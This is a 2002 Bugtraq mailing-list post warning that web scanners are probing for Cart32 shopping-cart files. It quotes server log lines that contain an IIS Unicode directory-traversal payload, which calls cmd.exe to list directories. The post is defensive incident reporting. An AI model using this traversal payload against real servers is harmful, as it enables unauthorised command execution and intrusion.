Smart Web Application Scanners (Sorta)

[zeno <bugtraq () cgisecurity net>]

Hey,

I get tons of cart32 scans on my machine. I've noticed that some scanners
as using "smarter" methods of scanning a host for such files.

Examples

202.95.138.6 - - [25/Feb/2002:11:15:46 -0500] "GET /snortcube.gif HTTP/1.0" 200 61988 
"http://www.cgisecurity.com/archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\";
 "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
202.95.138.6 - - [25/Feb/2002:11:15:46 -0500] "GET /snortcube.gif HTTP/1.0" 200 61988
80.17.84.2 - - [25/Feb/2002:11:16:00 -0500] "GET /robots.txt HTTP/1.0" 200 19 "-" "Mozilla/4.0 (compatible; MSIE 4.01; 
Windows NT; MS Search 4.0 Robot) Microsoft"
80.17.84.2 - - [25/Feb/2002:11:16:00 -0500] "GET /robots.txt HTTP/1.0" 200 19
202.95.138.6 - - [25/Feb/2002:11:16:12 -0500] "GET /archive/index.shtml HTTP/1.0" 200 4971 
"http://www.cgisecurity.com/archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\";
 "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"

You'll notice it is trying any file or directory name with "cart32" for it being vulnerable.

www.site/path/cart32.pdf for example will have an exploit appended to it like the one above.
If you have cart32 installed and you have renamed it you may want to peek in your logs or perhaps
rename it to not contain cart32 in it at all(do with caution)

Also you will notice the request for robots.txt sequential (may be related perhaps)
I've seen other scans using different exploits but I figured some people may be interested.


- zeno () Cgisecurity com

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com